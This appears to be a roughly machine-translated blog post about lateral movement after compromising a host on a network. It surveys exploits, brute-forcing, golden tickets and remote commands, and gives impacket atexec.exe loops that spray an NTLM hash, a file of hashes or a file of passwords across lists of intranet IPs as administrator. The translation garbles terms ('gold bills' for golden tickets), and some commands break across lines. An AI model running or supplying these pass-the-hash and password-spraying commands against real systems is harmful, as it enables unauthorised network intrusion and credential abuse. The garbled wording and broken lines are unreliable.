Preface
When you get a machine in a certain domain, you need to further expand the results. At this time, you need to move laterally. The technology of lateral movement is based on the results of information collection. Information collection is very important. Remember.
Several implementation methods are recommended:
- Use existing exp to attack the operating system, such as ms17010, ms08067, etc.
- Use the password to blast ssh or blast the smb service, which can be achieved with the impacket tool.
- Use rce vulnerabilities in server applications, such as middleware vulnerabilities such as tomcat.
- Making gold bills for lateral movement can be achieved with impacket and mimikatz tools.
- Use windows' built-in commands to remotely control the other host.
- Attack sensitive ports.
achieve
Use exp to attack the operating system
This part mainly relies on accumulation. According to the other party's operating system, download the corresponding exp online to attack, of course, you can write exp.
Use password blasting
If you want to attack a linux host, ssh blasting is a good method. It is relatively simple to write a python script by yourself.
If you are attacking the windows host, you can also use password blasting. The specific implementation method is to use the impacket tool:
Intranet machines are traversed for hash delivery verification, the content of ips.txt is intranet ip, one per paragraph FOR /F %i in (ips.txt) do
atexec.exe -hashes :3dbde697d71690a769204beb12283678
./administrator@%i whoami
Specify the host ntlm hash traversal verification, hashes.txt is the known ntlm hash content, one for each paragraph FOR /F %i in
(hashes.txt) do atexec.exe -hashes %i ./[email protected]
whoami
文件内部的hash格式应该为":nthash"或者"lmhash:nthash",如果只采用nthash切记加一个冒号":"
Intranet machines are traversed for password verification, passwords.txt is the content of known passwords, one per paragraph FOR /F %i in (passwords.txt) do
atexec.exe ./administrator:%[email protected] whoami
Specify the host password traversal verification, the content of ips.txt is the intranet ip, one per paragraph FOR /F %i in (ips.txt) do atexec.exe
./administrator:123@%i whoami
For more detailed information, please see my impacket command summary .
Exploit vulnerabilities in server-side applications
Many of these examples will be explained in articles one after another.
Gold note
Please see my article about gold bill related technologies:
The production and use of gold bills .
Summary of mimikatz commonly used commands summary of
impacket commands
Use windows' built-in commands to remotely control the other host
The following two articles describe it in more detail:
Windows remote commands execute
windows common shortcut commands
Attack on sensitive ports
You can first take a look at my common attack methods for sensitive ports, and I will write specific articles to explain the corresponding knowledge points later.
Appendix: Post-infiltration information collection
My two articles summarize it:
Windows information collection and intranet positioning
after Linux penetration information collection